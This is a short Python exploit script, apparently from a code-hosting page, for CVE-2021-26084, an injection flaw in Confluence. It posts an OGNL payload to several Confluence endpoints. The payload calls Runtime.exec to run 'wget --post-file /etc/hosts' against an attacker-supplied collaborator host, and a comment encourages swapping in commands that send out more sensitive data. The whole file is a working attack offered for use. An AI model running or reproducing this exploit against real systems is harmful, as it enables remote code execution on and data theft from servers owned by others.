/
CVE-2021-26084.py
32 lines (28 loc) · 1.62 KB
/
CVE-2021-26084.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import requests
import sys
import logging
from requests.packages import urllib3
logging.basicConfig(level=logging.DEBUG)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from urllib3 import disable_warnings
#DorkerDevil
#no def. not dropping any shell.
#log the requests
list_endpoint = [ #hit multiple endpoints
"/pages/createpage-entervariables.action?SpaceKey=x",
"/pages/doenterpagevariables.action",
"/pages/createpage.action?spaceKey=myproj",
"/users/user-dark-features",
"/pages/templates2/viewpagetemplate.action",
"/template/custom/content-editor",
"/templates/editor-preload-container",
"/pages/createpage-entervariables.action"]
collab = sys.argv[1]
src_url = sys.argv[2]
#change the command as per ur need , cuz its harmless but still u can exfil. some nasty stuff out of the system
dirty_command = 'wget --post-file /etc/hosts'+collab
for l in list_endpoint:
target_url = src_url + l
target_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
target_data = {"queryString": "dropdead\\u0027,(linkCreation)(0xd0ff90),\\u0027dropdead", "linkCreation" : "@java.lang.Runtime@getRuntime().exec('"+dirty_command+"')"}
requests.post(target_url, headers=target_headers, data=target_data, verify=False)